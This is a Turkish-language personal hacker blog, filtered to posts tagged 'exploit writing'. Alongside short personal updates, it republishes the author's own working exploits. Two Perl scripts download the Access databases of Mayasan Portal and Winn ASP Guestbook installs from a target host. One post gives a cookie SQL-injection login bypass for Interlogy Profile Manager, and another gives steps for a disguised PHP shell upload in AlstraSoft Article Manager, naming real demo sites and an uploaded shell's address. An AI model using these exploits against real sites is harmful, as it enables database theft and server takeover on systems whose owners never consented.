"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
exploit yazma etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

26 Temmuz 2011 Salı

özlemişim :))

ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.

2 Ağustos 2010 Pazartesi

exploitler ile ilgili

şimdi bu blogspot kafasına göre güvenlik uygulaması yapıyor ya :D dolayısıyla exploitleri tam yayınlayamıyorum yani kodlar eksik olabilir benim blogda. dolayısıyla verdiğim orjinal linklerden kullanın ;) blogspottan sıkılmaya başladım bakalım çözüm nolcak :S

Mayasan Portal V 1.0 / V 2.0 Database Disclosure Exploit (.pl)

http://inj3ct0r.com/exploits/13524


========================================================
MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
========================================================


#!/usr/bin/perl -w
#
# MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
#
# Found & Coded: ZoRLu
#
# Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg
#
# Date: 25/07/2010
#
# Home: z0rlu.blogspot.com
#
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
#
# Download : http://mportal.somee.com/indir/v20/v20/v20.zip



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : admin[at]yildirimordulari.com *\n";
print "\* Home : http://z0rlu.blogspot.com *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="db/mayasanportal.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


# Inj3ct0r.com [2010-07-30]

16 Ekim 2009 Cuma

beynimde buffer overflow :( msnim hacklen(me)miş olabilir

şurdan vardım o kanıya birincisi hiç oturum acılmadı benim msn de a.q hiç olmasa hacked by x yazıp hava atardı hackleyen ben rastlamadım rastlayan olduysa burdan bildirsin lütfen ;) ikincisi benim msn ile bloğuda hackleyebilirdi fakat herhangi bi hamle yapılmamış yani sifre talep edip bloğu ele gecirebilirdi hackleyen kişi. geriye tek bi ihtimal kaldı msn şifremi değiştim fakat şimdi hatırlayamıyorum. o günlerde buffer overflow ile meşguldüm en sonunda başardım 2 program için buffer overflow exploit yazdım onu başardım fakat farkında olmadan beynimde de bi hafıza taşması oldu mu diye düşünmüyor değilim :( biraz mola vermenin zamanı geldi gibi :(

9 Haziran 2009 Salı

Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability

kaynak: http://www.milw0rm.com/exploits/8895

kaynak: http://yildirimordulari.com/showthread.php?t=8551



desc:

normal login for cookie

pmadm=dGVzdA;

if ý do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;

or

pmadm=dGVzd123231212313;

not login

if ý do wthis:

pmadm=dGVzd ' or ';

boom this loggin :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

2 Haziran 2009 Salı

AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability

kaynak: http://www.milw0rm.com/exploits/8855

kaynak: http://www.yildirimordulari.com/showthread.php?t=7689



add this code you shell head:

exapmle:

GIF89a;

...
...
...

?>

save you shell.php

after go here:

yildirimordulari.com/article/register.php

after select your shell.php

done register after login to site edit your profile

and you look your shell name

yildirimordulari.com/article/images/author_pics/[id].php

example demo:

http://www.blizsoft.com/article/register.php

user: salla

pass: 123a123

shell:

http://www.blizsoft.com/article/images/author_pics/41.php

4 Mayıs 2009 Pazartesi

Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit

kaynak: http://www.milw0rm.com/exploits/8596

kaynak: http://www.yildirimordulari.com/showthread.php?t=6326

#!/usr/bin/perl -w
#
# Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit
#
# Found By : ZoRLu
#
# Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com
#
# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz
#
# Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends
#
# Download : http://winn.ws/downloads/asp-guestbook-v1-01.zip



use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit');
system('color 2');


if(@ARGV < 2)
{
print "[-]Exp KullanIm HatasI\n";
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] KullanIm : perl $0 url/IP Path \n";
print "[+] if your target have a path : perl $0 site.com /path/ \n";
print "[+] example : perl $0 lifelinesydney.org /asp-guestbook/ \n";
print "[+] if your target doesnt have a path : perl $0 site.com / \n";
print "[+] example : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit *\n";
print "\* Exploited By : ZoRLu *\n";
print "\* msn : trt-turk[at]hotmail.com *\n";
print "\* Home : yildirimordulari.com , dafgamers.com *\n";
print "\* Dork: Winn ASP Guestbook from Winn.ws *\n";
print "\*************************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="data/guestbook.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n WWW.YiLDiRiMORDULARi.COM\n\n";
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
 
Dizi